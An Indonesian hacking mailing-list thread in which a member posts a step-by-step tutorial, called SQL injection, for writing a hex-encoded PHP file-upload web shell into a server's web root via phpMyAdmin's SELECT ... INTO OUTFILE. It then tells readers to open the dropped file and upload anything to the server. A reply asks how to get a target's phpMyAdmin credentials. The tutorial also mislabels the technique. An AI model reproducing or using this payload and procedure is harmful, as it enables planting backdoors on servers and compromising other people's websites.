Injin nyoba Pak
--- On Mon, 30/8/10, Andy Rz <andy...@yahoo.co.id> wrote:
From: Andy Rz <andy...@yahoo.co.id>
Subject: Bls: [YF] [SHARE] Teknik dasar hacking - SQL Injection
To: yogyafree-perjuangan@yahoogroups.com
Date: Monday, 30 August, 2010, 11:15 AM
Thanks banget fren tutorialnya. Btw, query itu kan bisa dijalanin kalo kita dah
masuk ke phpmyadminnya target ya...?
Terus gimana caranya ya kita dapetin username dan pasword phpmyadminnya?
Dari: Ferdiboys83 <ferdiboy...@yahoo.com>
Kepada: yogyafree-perjuangan@yahoogroups.com
Terkirim: Jum, 27 Agustus, 2010 17:40:51
Judul: [YF] [SHARE] Teknik dasar hacking - SQL Injection
Sekedar berbagi ilmu buat yang ingin belajar hacking dan bukan bermaksud
menyombongkan diri.
Dalam kesempatan kali ini, saya ingin berbagi ke teman-teman semua dari hasil
belajar hacking dengan teknik SQL Injection.
Langkah-langkah sebelum mencoba hacking adalah :
Berdoa, mohon ampun kepada Allah SWT semoga situs yang nantinya di hack bukan
situs orang yang tidak bersalah
Pahami aplikasi web server yang terpasang di situs/websitenya. Misalnya :
xampp, wampp, dll
Kesabaran dan terus mencoba apabila gagal
Berikut penjelasannya..
A. Jika Teman-teman masuk dalam aplikasi yang berbasis webbase di kantor
atau PC localhost teman-teman, masuklah ke halaman phpMyadmin seperti pada
gambar dibawah ini.
B. Setelah masuk kedalam phpmadmin, lihat variables atau jenis aplikasi
web server yang digunakan terutama folder penyimpanan webnya.
Misalkan aplikasi web server xampp. Lokasi penyimpanan berada di : xampp/htdocs
C. Setelah mengetahui dan membayangkan lokasi penyimpanan foldernya,
lakukan proses import dengan mengcopy-paste scrip dibawah ini :
SELECT
0x3c3f706870206563686f20223c666f726d206d6574686f643d27504f53542720656e63747970653d276d756c7469706172742f666f726d2d64617461273e3c696e70757420747970653d2766696c6527206e616d653d2766696c656c65272073697a653d273434273e3c696e70757420747970653d277375626d6974273e3c2f666f726d3e223b40636f707928245f46494c45535b2766696c656c65275d5b27746d705f6e616d65275d2c245f46494c45535b2766696c656c65275d5b276e616d65275d293b3f3e
INTO OUTFILE "c:/xampp/htdocs/test.php"
D. Paste di Menu SQL seperti ini :
E. Jika proses import tersebut berhasil, maka akan mencul pesan : Succes
pada layar.
F. Ketiklah halaman link yang kita inject tadi, dengan keterangan sebagai
berikut : alamat ip/nama file yang kita inject
Misalkan seperti diatas : 192.168.1.10/test.php
Seperti pada layar berikut :
G. Jika halaman atau target yang kita tentukan muncul seperti halaman yang
ada diatas, maka proses SQL tadi sudah berhasil. Web yang kita SQL inject tadi
sudah berhasil kita hack.
Langkah selanjutnya teman-teman bisa memasukkan apapun ke dalam server yang
sudah kita inject tadi.
Catatan :
Hacker adalah teknik mencari celah kelemahan suatu system, bukan sebagai
perusak.
Mohon maaf apabila ada kekurangan dan kesalahan dalam penjelasan saya. Disini
saya masih belajar dan bukan untuk mensombongkan diri atas apa yang sudah saya
dapatkan.
Semoga pembahasan ini dapat bermanfaat bagi teman-teman semua.
MAJU TERUS HACKER INDONESIA
Ferdiboys83
Jangan buat hidup sulit, buatlah hidup menjadi lebih berarti
